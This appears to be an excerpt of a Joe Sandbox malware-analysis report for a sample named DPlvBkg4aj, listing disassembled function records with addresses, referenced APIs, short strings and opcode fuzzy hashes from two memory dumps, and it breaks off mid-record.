Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
Instruction ID: 33c3d70ca80d203c703bfa910afc7728cabd0a80c35bb9a5ae7b0b0dff6c1121
Opcode Fuzzy Hash: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
Instruction Fuzzy Hash: BA91B5B1E042548FCB08CF6CC89169DBBF2BF89310F2982ADD855AB391D7759C01CB91

Function 00432426 Relevance: 1.7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

Strings

J, xrefs: 0043249F

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: J
API String ID: 0-1141589763
Opcode ID: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction ID: fda16036ad69fd6001319f3414ba3134900024cf57a0a68240a2308677c6b07d
Opcode Fuzzy Hash: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction Fuzzy Hash: 82127D71609AC18FE3158B38C591392BFE1AB66304F1CC9AEC4EACB387D63AD5068755

Function 0069268D Relevance: 1.7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

Strings

J, xrefs: 00692706

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: J
API String ID: 0-1141589763
Opcode ID: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction ID: 51c7dfd38905160daf36526a23dd9a01b42ba65eedd1de0f44a644ba794254a1
Opcode Fuzzy Hash: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction Fuzzy Hash: DD128D71609AC18FE3158B38C491392BFE2AB66304F1CC9ADC4EACB387D63AD506C751

Function 004374AB Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 004375CB

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction ID: 45239876aaa66c970168bcac432cbab02119562676560ecae2c3189c67bbcca7
Opcode Fuzzy Hash: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction Fuzzy Hash: 6571C7B1E046508FC718CF6CC851359BFF2AB99314F2982ADD8999F3D2D6759C06CB81

Function 00697712 Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 00697832

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction ID: 7d10c401834ab642b23b623d432be1273de65f6ceaea6dadd7e224d23ff270f3
Opcode Fuzzy Hash: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction Fuzzy Hash: 1671B3B1E046508FC718CF6CC85535ABFF2AB86314F2982ADD8999F3D2D6759C06CB81

Function 00435D13 Relevance: 1.7, APIs: 1, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00435DB9

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
Instruction ID: f2a30e19a756ef2febaf58aa14edd62971e43cb539abc4116fa3d4166735a6c9
Opcode Fuzzy Hash: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
Instruction Fuzzy Hash: 51913A21208BC28ED3268B3C88486157F915B67228F2C87DCE0FA8F7E7C6568107C366

Function 0043443D Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004344E1

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction ID: 615ca32909d59e4e98a0e547278d02967b49bf7f3b148c397c41720c4b96474d
Opcode Fuzzy Hash: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction Fuzzy Hash: EB912C11208BC28EC326CA3C88586557F921BA7228F2D87DDD0FA8F7D7C7669507C766

Function 006946A4 Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00694748

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction ID: cdc12f9b6670d54726121c1757fa72bebb2af1f947a06b16b830dea63b6ac987
Opcode Fuzzy Hash: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction Fuzzy Hash: D8912B21208BC28EC726CA3C88586557F921B67228B2D87DCD0FA8F7D7C766D507C766

Function 0041BEE1 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0041C360, 0041C364

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A

Function 0067C148 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0067C5C7, 0067C5CB

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
Instruction ID: 625a52c2f24d46a07988b8092065207776a6c84f954e00a6c5f41cd264b40e5c
Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
Instruction Fuzzy Hash: 1A9123B15183108BC314CF28C8916ABB7E2EFD1364F18DA2CE8D98B791E774DA45C792

Function 00416ED0 Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

*+, xrefs: 00417069

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: *+
API String ID: 0-2181965719
Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A

Function 00427070 Relevance: 1.5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

Strings

@+p, xrefs: 00426956, 00427085

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: 5194799259fd5a137c82c89d43496dce8058f14fa6ca7be25fd15c1bfac91166
Instruction ID: 4e43b3032b5f77b82ebf5265758dd730748cf5b28328c74b298a748a547da810
Opcode Fuzzy Hash: 5194799259fd5a137c82c89d43496dce8058f14fa6ca7be25fd15c1bfac91166
Instruction Fuzzy Hash: A2915635E04225DFDB15CFA8D8907AEB7B2FF4A300F9980A9D502AB351D739AD42CB44

Function 00433930 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

d, xrefs: 004339CA

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
Instruction ID: ef403fb1259512c9711d70f2e7d5f4cfd006a755ed026aeb3bab0d0ce1423d2c
Opcode Fuzzy Hash: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
Instruction Fuzzy Hash: 49816827759AD04BD7289E3C4C6127ABE830BD6230F2DD77EB5F68B3E2D56889018345

Function 00693B97 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

d, xrefs: 00693C31

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
Instruction ID: 44970a49ef577df7d862bede0a2cccc29d9f890b48d6b3c21ffa4746ae349e80
Opcode Fuzzy Hash: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
Instruction Fuzzy Hash: C5814B36759AA04BDB28993C4C212BA7A930BD3330F2DC77EB5F68B7E2D55489068340

Function 00442A60 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

@+p, xrefs: 00442A77, 00442B28

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: 9c90c13bf0ad2025be2ee518816828ce6c161b5f342d5640831e38625303febd
Instruction ID: 6a93b08fa6992d126e12a7bd6c306b93c6ef3d764d3eda4b37502e868ad0b706
Opcode Fuzzy Hash: 9c90c13bf0ad2025be2ee518816828ce6c161b5f342d5640831e38625303febd
Instruction Fuzzy Hash: A581F0342043169FD724DF28C980A6BB3E1EF89324F58862DF9958B3A1E774EC11CB49

Function 006A2CC7 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

@+p, xrefs: 006A2CDE, 006A2D8F

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: e9967d51fbd7d66a82ac835e53c8b6f5d839448025aa1fb83a89f7dd4b290d4c
Instruction ID: fd92f0c4e1ebe5906aefb72d7a4221f93167fd3c48203f7c7ab82f3b381f54ba
Opcode Fuzzy Hash: e9967d51fbd7d66a82ac835e53c8b6f5d839448025aa1fb83a89f7dd4b290d4c
Instruction Fuzzy Hash: AB817E756443569FC714EF1CC8A0A6AB3E2FF86320F14866CE9958B3A1E731EC51CB41

Function 006A2A17 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

@+p, xrefs: 006A2A2E, 006A2AED

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
Instruction ID: eb900a4c5bd46d9d39d148c820979a9bcbc5313a3eff524f881313919229c45d
Opcode Fuzzy Hash: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
Instruction Fuzzy Hash: D881B2346452029BC724EF1CC8A0A6EB3F2FF9A724F15856CE9858B3A1DB31EC51CB55

Function 0042D830 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042DA2E

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A

Function 0068DA97 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0068DC95

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 6d63c4a8bd55e55664af7f19591ef9052e4183d6893548df50bea4c28a13b906
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 96710432A083555BD724EE28D88035EB7E3ABC5720F29C66DE4949B3D1D274DC45C7A2

Function 0066D253 Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

2B309B639C22768FD0632DF0E28DC412, xrefs: 0066D3D2

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: 2B309B639C22768FD0632DF0E28DC412
API String ID: 0-4035031634
Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction ID: deeffdceb80730ff6ad09efac9160e3525ea679144ab3a8985a8d20e40a516bb
Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction Fuzzy Hash: 795169726057008FD729CF38CC82AA67BE3EFD6310B1D866CC5964B796DA39A406C750

Function 0041A900 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

_;=8, xrefs: 0041AA58

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: _;=8
API String ID: 0-3640539833
Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
Instruction ID: e58a9c241393c577c0dbf69e703309a02622358f74323d7420d86702d8d0d07f
Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
Instruction Fuzzy Hash: 245112B0521B008BC7249F25C8616B3BBF1EF52345B084E5DC4C38BB45E739A948CBA5

Function 0067AB67 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

_;=8, xrefs: 0067ACBF

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: _;=8
API String ID: 0-3640539833
Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
Instruction ID: 0d8cb635e85056e852304ced1c37e661c1e5d6346d23f8234d167e50658733d8
Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
Instruction Fuzzy Hash: 8C51EFB0511B408BC7389F25C8616B7BBF2EF92345B088A5DC5C78BB45E739A909CB61

Function 00677137 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

*+, xrefs: 006772D0

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: *+
API String ID: 0-2181965719
Opcode ID: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
Instruction ID: 740405c60d01d6323d706c74a305c5c7b5cb7c694b102f9b1248b0815f9d9290
Opcode Fuzzy Hash: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
Instruction Fuzzy Hash: C16120B140A3C18BD770CF2588917DBBBE2AF96328F14892CD5CC9B244EB384146CB87

Function 0043C9A0 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

@+p, xrefs: 0043CAC7

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: InitializeThunk
String ID: @+p
API String ID: 2994545307-2846808199
Opcode ID: 6946c5d2f57fcbacdc517e199e457a610470862e953e395443f30e92702119ba
Instruction ID: a4b821128decaa172c514915c42a23315f051a59fcda10375df645c6c4b50b9f
Opcode Fuzzy Hash: 6946c5d2f57fcbacdc517e199e457a610470862e953e395443f30e92702119ba
Instruction Fuzzy Hash: DF417C759043146BE310EF24ECC1B6BB7A4EF89708F10942EF985A7251E735EC04879A

Function 0069CC07 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

@+p, xrefs: 0069CD2E

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
Instruction ID: a2941f52b38158623ff3c6386ce02aa6792825f1c04969064571efa6c927b316
Opcode Fuzzy Hash: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
Instruction Fuzzy Hash: DB418C71A043106FDB149F68DD51B6B7BAAEF85B14F14843CF94593650E732EC08CB96

Function 00440BAB Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

}I\, xrefs: 00440CA6

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: }I\
API String ID: 0-3759065986
Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
Instruction ID: 06326f033c1d303d2a0c44ae50e6a95f42fac71f38a9198839615570ed5a6674
Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
Instruction Fuzzy Hash: 653126605546928BEB258F34C8A27B7BBB0FF47310F144759C8C18B785EB78A992CB85

Function 00678809 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

@+p, xrefs: 00678817, 0067887E

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: 2f3d0f86c51dd52561bd956f66a0919b21b2b2791d13a1f53376856cb036d1a9
Instruction ID: 0d91fa3fd53b8d3d0e295ce94209df94ddeb4f488bd10d2622af203c94f0b183
Opcode Fuzzy Hash: 2f3d0f86c51dd52561bd956f66a0919b21b2b2791d13a1f53376856cb036d1a9
Instruction Fuzzy Hash: CC11CA34691210EED6649F188DCAB7D3263EB46710FA48628F159931E2EB717C618A0E

Function 0043F0E0 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

@+p, xrefs: 0043F106

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: InitializeThunk
String ID: @+p
API String ID: 2994545307-2846808199
Opcode ID: ecd1faefde76f36583f38613df2e5eb9d8d0823934d6840002cbd1f744ed8a38
Instruction ID: 0c7a45b7bc69abfe1ea4a300e8af6adda297262347155a361b302868447e3dd6
Opcode Fuzzy Hash: ecd1faefde76f36583f38613df2e5eb9d8d0823934d6840002cbd1f744ed8a38
Instruction Fuzzy Hash: AFF0D635904214BBD5104F49EC81D37737DE7CE768F141329E514122A2A732AD1186A9

Function 0069F347 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

@+p, xrefs: 0069F36D

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: f5d7cfea0e4e327b9eda319c71044655f3c20aae259e9c189ca88ac76d4abae3
Instruction ID: 4f727fa52c9f06b7ec03c904c38762b3bc4f4c4abeb01cd692143f822c61c0b6
Opcode Fuzzy Hash: f5d7cfea0e4e327b9eda319c71044655f3c20aae259e9c189ca88ac76d4abae3
Instruction Fuzzy Hash: 10F0D675500218BBD6105B499C81D3B77AFEBCE778F154328E41892661A322ED119AE9

Function 0068B8B5 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

@+p, xrefs: 0068B93D

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: 6146b7094830001aaaf13cb0f51437480e6ddd60403108575e1b98eecd2c1ab1
Instruction ID: 104c4f836867c911d4342f013a2f6d9b775cde037c9aefe09db20eca900b215a
Opcode Fuzzy Hash: 6146b7094830001aaaf13cb0f51437480e6ddd60403108575e1b98eecd2c1ab1
Instruction Fuzzy Hash: A4F096B4A08611DBDA14AF18DC4267A73B7EF87351F14662CE25517274D331AC11CB0D

Function 00418672 Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

@+p, xrefs: 004185B0, 00418617

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
Instruction ID: c14077b8a130247762470a12415ef9365636b0c970e2bf5ce29861a99db5fcbf
Opcode Fuzzy Hash: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
Instruction Fuzzy Hash: B2F08238502120EEC7588F189EC157D73A2F747311729147EC406A31A0DF34ACD2C90E

Function 006758FA Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

@+p, xrefs: 0067590D

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: fba0dd296d97388ae8806046d0d018cb5991b0a5fc03ca011737e50afd9cac09
Instruction ID: d4a50035ab6b462a5a175ecdcdb811a896d4a61b935815adc5f079082ce3b5be
Opcode Fuzzy Hash: fba0dd296d97388ae8806046d0d018cb5991b0a5fc03ca011737e50afd9cac09
Instruction Fuzzy Hash: 82F0E234A09611EFE718DB08D891579B363FB86321F98C2BCE29E871A0C3717C918A48

Function 00686BA7 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

@+p, xrefs: 00686BBD

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

